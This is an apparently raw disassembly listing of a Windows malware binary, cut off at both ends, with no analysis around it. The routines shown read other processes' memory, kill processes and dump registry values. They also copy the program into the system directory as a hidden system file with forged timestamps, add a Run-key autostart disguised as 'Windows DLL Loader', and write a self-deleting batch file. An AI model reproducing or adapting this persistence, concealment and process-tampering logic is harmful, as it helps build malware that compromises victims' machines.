arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_4], 0
jz short loc_40651B
cmp [ebp+arg_C], 0
jnz short loc_406520
loc_40651B: ; CODE XREF: sub_406509+A�j
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406520: ; CODE XREF: sub_406509+10�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_8]
call sub_40A8AD
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 180h
jbe short loc_406554
mov [ebp+var_4], 180h
loc_406554: ; CODE XREF: sub_406509+42�j
mov eax, [ebp+var_4]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
push [ebp+var_8]
push 0
push 10h
call dword_417094 ; OpenProcess
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_406586
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406586: ; CODE XREF: sub_406509+6D�j
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
push [ebp+var_1C]
push [ebp+var_C]
push [ebp+var_18]
call dword_417098 ; ReadProcessMemory
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_40662F
cmp [ebp+var_14], 0
jz short loc_40662F
mov eax, [ebp+var_1C]
add eax, [ebp+var_4]
and byte ptr [eax], 0
and [ebp+var_20], 0
jmp short loc_4065C9
; ---------------------------------------------------------------------------
loc_4065C2: ; CODE XREF: sub_406509:loc_406620�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4065C9: ; CODE XREF: sub_406509+B7�j
mov eax, [ebp+var_20]
cmp eax, [ebp+var_14]
jnb short loc_406622
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 16h
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 10h
jg short loc_406620
loc_406617: ; CODE XREF: sub_406509+D4�j
; sub_406509+E2�j ...
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
mov byte ptr [eax], 2Eh
loc_406620: ; CODE XREF: sub_406509+10C�j
jmp short loc_4065C2
; ---------------------------------------------------------------------------
loc_406622: ; CODE XREF: sub_406509+C6�j
push [ebp+var_1C]
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
loc_40662F: ; CODE XREF: sub_406509+9E�j
; sub_406509+A8�j
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
push [ebp+var_18]
call dword_4170A4 ; CloseHandle
locret_406641: ; CODE XREF: sub_406509:loc_40651B�j
; sub_406509+78�j
leave
retn
sub_406509 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406643 proc near ; CODE XREF: sub_40A9CF+3D7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_406650
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406650: ; CODE XREF: sub_406643+9�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
call dword_4170E8 ; GetCurrentProcessId
cmp [ebp+var_4], eax
jnz short loc_406669
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406669: ; CODE XREF: sub_406643+22�j
push [ebp+var_4]
push 0
push 1
call dword_417094 ; OpenProcess
mov [ebp+var_8], eax
push 0
push [ebp+var_8]
call dword_4170A0 ; TerminateProcess
push [ebp+var_8]
call dword_4170A4 ; CloseHandle
locret_40668D: ; CODE XREF: sub_406643+B�j
; sub_406643+24�j
leave
retn
sub_406643 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40668F proc near ; CODE XREF: sub_403DF3+149�p
; sub_40A9CF+BD�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_4066A0
; ---------------------------------------------------------------------------
loc_406699: ; CODE XREF: sub_40668F+2A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066A0: ; CODE XREF: sub_40668F+8�j
cmp [ebp+var_4], 8
jge short loc_4066BB
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_406699
; ---------------------------------------------------------------------------
loc_4066BB: ; CODE XREF: sub_40668F+15�j
mov eax, [ebp+arg_0]
and byte ptr [eax+8], 0
and [ebp+var_4], 0
jmp short loc_4066CF
; ---------------------------------------------------------------------------
loc_4066C8: ; CODE XREF: sub_40668F+59�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066CF: ; CODE XREF: sub_40668F+37�j
cmp [ebp+var_4], 6
jge short loc_4066EA
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066C8
; ---------------------------------------------------------------------------
loc_4066EA: ; CODE XREF: sub_40668F+44�j
mov eax, [ebp+arg_4]
and byte ptr [eax+6], 0
and [ebp+var_4], 0
jmp short loc_4066FE
; ---------------------------------------------------------------------------
loc_4066F7: ; CODE XREF: sub_40668F+88�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066FE: ; CODE XREF: sub_40668F+66�j
cmp [ebp+var_4], 10h
jge short loc_406719
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066F7
; ---------------------------------------------------------------------------
loc_406719: ; CODE XREF: sub_40668F+73�j
mov eax, [ebp+arg_8]
and byte ptr [eax+10h], 0
leave
retn
sub_40668F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406722 proc near ; CODE XREF: sub_40A9CF+F40�p
var_424 = byte ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 424h
cmp [ebp+arg_4], 0
jnz short loc_406736
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406736: ; CODE XREF: sub_406722+D�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+4]
cmp eax, 5Ch
jz short loc_406747
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406747: ; CODE XREF: sub_406722+1E�j
push 4
push offset aHkcr ; "HKCR"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_406769
mov [ebp+var_218], 80000000h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_406769: ; CODE XREF: sub_406722+39�j
push 4
push offset aHkcu ; "HKCU"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40678B
mov [ebp+var_218], 80000001h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_40678B: ; CODE XREF: sub_406722+5B�j
push 4
push offset aHklm ; "HKLM"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067AD
mov [ebp+var_218], 80000002h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067AD: ; CODE XREF: sub_406722+7D�j
push 4
push offset aHkus ; "HKUS"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067CF
mov [ebp+var_218], 80000003h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067CF: ; CODE XREF: sub_406722+9F�j
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4067D4: ; CODE XREF: sub_406722+45�j
; sub_406722+67�j ...
mov eax, [ebp+arg_4]
add eax, 5
mov [ebp+arg_4], eax
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_210], eax
jmp short loc_4067FB
; ---------------------------------------------------------------------------
loc_4067EE: ; CODE XREF: sub_406722:loc_406858�j
mov eax, [ebp+var_210]
dec eax
mov [ebp+var_210], eax
loc_4067FB: ; CODE XREF: sub_406722+CA�j
cmp [ebp+var_210], 0
jnz short loc_406809
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406809: ; CODE XREF: sub_406722+E0�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_210]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406858
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 200h
jb short loc_40683A
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40683A: ; CODE XREF: sub_406722+111�j
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40685A
; ---------------------------------------------------------------------------
loc_406858: ; CODE XREF: sub_406722+F6�j
jmp short loc_4067EE
; ---------------------------------------------------------------------------
loc_40685A: ; CODE XREF: sub_406722+134�j
cmp [ebp+var_210], 200h
jb short loc_40686B
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40686B: ; CODE XREF: sub_406722+142�j
push [ebp+var_210]
push [ebp+arg_4]
lea eax, [ebp+var_418]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_210]
and [ebp+eax+var_418], 0
lea eax, [ebp+var_C]
push eax
push 1
push 0
lea eax, [ebp+var_418]
push eax
push [ebp+var_218]
call dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_4068B5
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4068B5: ; CODE XREF: sub_406722+18C�j
mov [ebp+var_8], 1000h
push [ebp+var_8]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_214], eax
lea eax, [ebp+var_8]
push eax
push [ebp+var_214]
lea eax, [ebp+var_4]
push eax
push 0
lea eax, [ebp+var_20C]
push eax
push [ebp+var_C]
call dword_41700C ; RegQueryValueExA
test eax, eax
jnz loc_406A0C
cmp [ebp+var_4], 1
jz short loc_4068FF
cmp [ebp+var_4], 2
jnz short loc_406915
loc_4068FF: ; CODE XREF: sub_406722+1D5�j
push [ebp+var_214]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406915: ; CODE XREF: sub_406722+1DB�j
cmp [ebp+var_4], 4
jnz short loc_406933
mov eax, [ebp+var_214]
push dword ptr [eax]
push offset dword_418B5C
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406933: ; CODE XREF: sub_406722+1F7�j
cmp [ebp+var_4], 3
jnz loc_406A0C
push 180h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_420], eax
mov eax, [ebp+var_420]
and byte ptr [eax], 0
and [ebp+var_41C], 0
jmp short loc_40696D
; ---------------------------------------------------------------------------
loc_406960: ; CODE XREF: sub_406722+2C3�j
mov eax, [ebp+var_41C]
inc eax
mov [ebp+var_41C], eax
loc_40696D: ; CODE XREF: sub_406722+23C�j
mov eax, [ebp+var_41C]
cmp eax, [ebp+var_8]
jnb short loc_4069EA
mov eax, [ebp+var_214]
add eax, [ebp+var_41C]
movzx eax, byte ptr [eax]
push eax
push offset dword_418B54
lea eax, [ebp+var_424]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
push [ebp+var_420]
call sub_416B40 ; strlen
pop ecx
add eax, 3
cmp eax, 180h
jb short loc_4069D1
push [ebp+var_420]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
mov eax, [ebp+var_420]
and byte ptr [eax], 0
loc_4069D1: ; CODE XREF: sub_406722+28E�j
lea eax, [ebp+var_424]
push eax
push [ebp+var_420]
call sub_416B70 ; strcat
pop ecx
pop ecx
jmp loc_406960
; ---------------------------------------------------------------------------
loc_4069EA: ; CODE XREF: sub_406722+254�j
push [ebp+var_420]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
push [ebp+var_420]
call sub_416B4C ; free
pop ecx
loc_406A0C: ; CODE XREF: sub_406722+1CB�j
; sub_406722+215�j
push [ebp+var_214]
call sub_416B4C ; free
pop ecx
push [ebp+var_C]
call dword_417028 ; RegCloseKey
locret_406A21: ; CODE XREF: sub_406722+F�j
; sub_406722+20�j ...
leave
retn
sub_406722 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A23 proc near ; CODE XREF: sub_40D043:loc_40D18D�p
; sub_40D871:loc_40DB71�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset dword_41DC40
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_20C]
push eax
call dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short locret_406AE5
push [ebp+var_108]
push 1
push 2
push offset dword_418DE0
call sub_416B7C ; fwrite
add esp, 10h
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406B81
pop ecx
locret_406AE5: ; CODE XREF: sub_406A23+90�j
leave
retn
sub_406A23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AE7 proc near ; CODE XREF: sub_40D043+13D�p
; sub_40D871+2F3�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset dword_41DC40
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push offset aRb ; "rb"
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short loc_406B7D
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_406B7F
; ---------------------------------------------------------------------------
loc_406B7D: ; CODE XREF: sub_406AE7+83�j
xor eax, eax
locret_406B7F: ; CODE XREF: sub_406AE7+94�j
leave
retn
sub_406AE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B81 proc near ; CODE XREF: sub_406A23+BC�p
; sub_406E8E+246�p
var_120 = dword ptr -120h
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 120h
push 104h
lea eax, [ebp+var_11C]
push eax
call dword_417040 ; GetWindowsDirectoryA
push offset dword_418DE8
lea eax, [ebp+var_11C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push 0
push 80h
push 3
push 0
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call dword_417048 ; GetFileTime
push [ebp+var_120]
call dword_4170A4 ; CloseHandle
push 0
push 80h
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call dword_41704C ; SetFileTime
push [ebp+var_120]
call dword_4170A4 ; CloseHandle
locret_406C4F: ; CODE XREF: sub_406B81+5A�j
; sub_406B81+A8�j
leave
retn
sub_406B81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C51 proc near ; CODE XREF: sub_406E8E+133�p
; sub_406E8E+214�p ...
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 108h
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call dword_417014 ; RegCreateKeyExA
cmp [ebp+arg_0], 0
jz short loc_406CE1
push 104h
lea eax, [ebp+var_108]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
call dword_41703C ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_108]
push eax
push 1
push 0
push [ebp+arg_4]
push [ebp+var_4]
call dword_417010 ; RegSetValueExA
jmp short loc_406CED
; ---------------------------------------------------------------------------
loc_406CE1: ; CODE XREF: sub_406C51+30�j
push [ebp+arg_4]
push [ebp+var_4]
call dword_417004 ; RegDeleteValueA
loc_406CED: ; CODE XREF: sub_406C51+8E�j
push [ebp+var_4]
call dword_417028 ; RegCloseKey
leave
retn
sub_406C51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CF8 proc near ; CODE XREF: sub_406D47+2B�p
; sub_406E8E+253�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
and [ebp+var_4], 0
jmp short loc_406D1D
; ---------------------------------------------------------------------------
loc_406D16: ; CODE XREF: sub_406CF8:loc_406D40�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_406D1D: ; CODE XREF: sub_406CF8+1C�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jnb short loc_406D42
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406D40
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+1]
mov [ebp+var_8], eax
loc_406D40: ; CODE XREF: sub_406CF8+39�j
jmp short loc_406D16
; ---------------------------------------------------------------------------
loc_406D42: ; CODE XREF: sub_406CF8+2B�j
mov eax, [ebp+var_8]
leave
retn
sub_406CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D47 proc near ; CODE XREF: sub_406E8E+9�p
; sub_407148+9�p
var_108 = byte ptr -108h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push 104h
lea eax, [ebp+var_108]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
lea eax, [ebp+var_108]
push eax
call sub_406CF8
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and byte ptr [eax], 0
lea eax, [ebp+var_108]
push eax
call dword_417038 ; SetCurrentDirectoryA
leave
retn
sub_406D47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D90 proc near ; CODE XREF: sub_406E8E+25A�p
; sub_407148+168�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_20], eax
and [ebp+var_1C], 0
loc_406DA8: ; CODE XREF: sub_406D90:loc_406DDF�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_1C]
mov [ebp+ecx+var_18], al
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnz short loc_406DDF
push offset a_bat ; ".bat"
mov eax, [ebp+var_1C]
lea eax, [ebp+eax+var_18]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_406DE1
; ---------------------------------------------------------------------------
loc_406DDF: ; CODE XREF: sub_406D90+37�j
jmp short loc_406DA8
; ---------------------------------------------------------------------------
loc_406DE1: ; CODE XREF: sub_406D90+4D�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
push 400h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_24], eax
lea eax, [ebp+var_18]
push eax
call dword_4170AC ; DeleteFileA
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_18]
push eax
call dword_417044 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_406E2B
xor eax, eax
jmp short locret_406E8C
; ---------------------------------------------------------------------------
loc_406E2B: ; CODE XREF: sub_406D90+95�j
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
push [ebp+arg_0]
push [ebp+arg_0]
push offset a@echoOffDelete ; "@echo off\r\n:deleteagain\r\ndel /A:H /F %s"...
push [ebp+var_24]
call dword_4171E0 ; wsprintfA
add esp, 18h
and [ebp+var_4], 0
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_24]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_24]
push [ebp+var_28]
call dword_417068 ; WriteFile
push [ebp+var_28]
call dword_4170A4 ; CloseHandle
push 0
push 0
push 0
lea eax, [ebp+var_18]
push eax
push offset aOpen ; "open"
push 0
call dword_4171D0
push 1
pop eax
locret_406E8C: ; CODE XREF: sub_406D90+99�j
leave
retn
sub_406D90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E8E proc near ; CODE XREF: sub_4167F1:loc_4169E1�p
var_368 = dword ptr -368h
var_338 = word ptr -338h
var_324 = byte ptr -324h
var_220 = dword ptr -220h
var_21C = byte ptr -21Ch
var_118 = byte ptr -118h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 368h
call sub_406D47
push 104h
lea eax, [ebp+var_324]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
and [ebp+var_14], 0
and [ebp+var_220], 0
jmp short loc_406ED1
; ---------------------------------------------------------------------------
loc_406EC4: ; CODE XREF: sub_406E8E:loc_406FF8�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_406ED1: ; CODE XREF: sub_406E8E+34�j
mov eax, [ebp+var_220]
shl eax, 1
cmp off_418B88[eax*4], 0
jz loc_406FFD
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_21C]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_324]
push eax
lea eax, [ebp+var_21C]
push eax
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_406FF8
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
push 1
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105AD
pop ecx
jmp locret_407146
; ---------------------------------------------------------------------------
loc_406FF8: ; CODE XREF: sub_406E8E+E3�j
jmp loc_406EC4
; ---------------------------------------------------------------------------
loc_406FFD: ; CODE XREF: sub_406E8E+53�j
push [ebp+var_14]
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_118]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_118]
push eax
call dword_4170AC ; DeleteFileA
loc_40707C: ; DATA XREF: .packed:0041AD4C�o
; .packed:0041AD60�o ...
push 0
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_324]
push eax
call dword_417060 ; CopyFileA
test eax, eax
jnz short loc_4070AF
push offset dword_41EB2C
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 1
call sub_406C51
add esp, 0Ch
jmp locret_407146
; ---------------------------------------------------------------------------
loc_4070AF: ; CODE XREF: sub_406E8E+206�j
push 4
lea eax, [ebp+var_118]
push eax
call dword_4170A8 ; SetFileAttributesA
push 2
lea eax, [ebp+var_118]
push eax
call dword_4170A8 ; SetFileAttributesA
lea eax, [ebp+var_118]
push eax
call sub_406B81
pop ecx
lea eax, [ebp+var_324]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
push 44h
push 0
lea eax, [ebp+var_368]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_368], 44h
and [ebp+var_338], 0
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_368]
push eax
push 0
push 0
push 28h
push 1
push 0
push 0
lea eax, [ebp+var_118]
push eax
push 0
call dword_41707C ; CreateProcessA
call dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
locret_407146: ; CODE XREF: sub_406E8E+165�j
; sub_406E8E+21C�j
leave
retn
sub_406E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407148 proc near ; CODE XREF: sub_402A32+7BB�p
; sub_40A9CF+145F�p ...
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
call sub_406D47
push 104h
lea eax, [ebp+var_20C]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
and [ebp+var_108], 0
jmp short loc_407187
; ---------------------------------------------------------------------------
loc_40717A: ; CODE XREF: sub_407148:loc_4072DB�j
mov eax, [ebp+var_108]
inc eax
mov [ebp+var_108], eax
loc_407187: ; CODE XREF: sub_407148+30�j
mov eax, [ebp+var_108]
shl eax, 1
cmp off_418B88[eax*4], 0
jz loc_4072E0
push 104h
lea eax, [ebp+var_104]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; strcat
